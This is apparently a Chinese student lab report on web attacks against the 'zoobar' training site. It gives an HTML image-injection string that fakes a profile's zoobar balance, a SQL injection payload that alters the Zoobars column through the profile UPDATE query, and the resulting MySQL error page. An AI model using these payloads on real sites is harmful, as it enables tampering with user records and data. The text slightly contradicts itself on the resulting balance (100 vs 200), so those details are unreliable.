1. 程式人生 > >實驗二: CSS

實驗二: CSS

資訊保安實踐實驗報告連結

CSS

實驗結果
CSS實驗結果

簡單攻擊

目的: 修改zoobars

方法一: 插入img

在profile填入如下內容, 具體到屬性可以在控制檯慢慢調理css, 知道符合一定到效果

<img src="http://7xol12.com1.z0.glb.clouddn.com/zoobar.png" style="position:relative;top:-59px;right:-70px;width:34px;height:21px"/>

得到如下結果
插入img修改結果

方法一: sql注入

經過輸入’等一系列字元進行判斷髮現沒有進行防sql注入, 其中也發現
UPDATE Person SET Profile=''' WHERE PersonID=1


這一句sql語句, 因此判斷存在sql注入問題, 因此構造輸入
', Zoobars=100, Profile='hello
構造sql注入使得Zoobars更改為200

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;">
    <tr><th colspan=2>Database Error</th></tr>
    <tr><td align="right" valign
="top">
Message:</td><td><b>MySQL Query fail:</b> UPDATE Person SET Profile=''' WHERE PersonID=1</td></tr> <tr><td align="right" valign="top" nowrap>MySQL Error:</td><td>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' WHERE PersonID=1' at line 1</td
>
</tr> <tr><td align="right">Date:</td><td>Wednesday, December 6, 2017 at 8:57:39 PM</td></tr> <tr><td align="right">Script:</td><td><a href="/index.php">/index.php</a></td></tr> <tr><td align="right">Referer:</td><td><a href="https://www.myzoo.com/index.php">https://www.myzoo.com/index.php</a></td></tr> </table>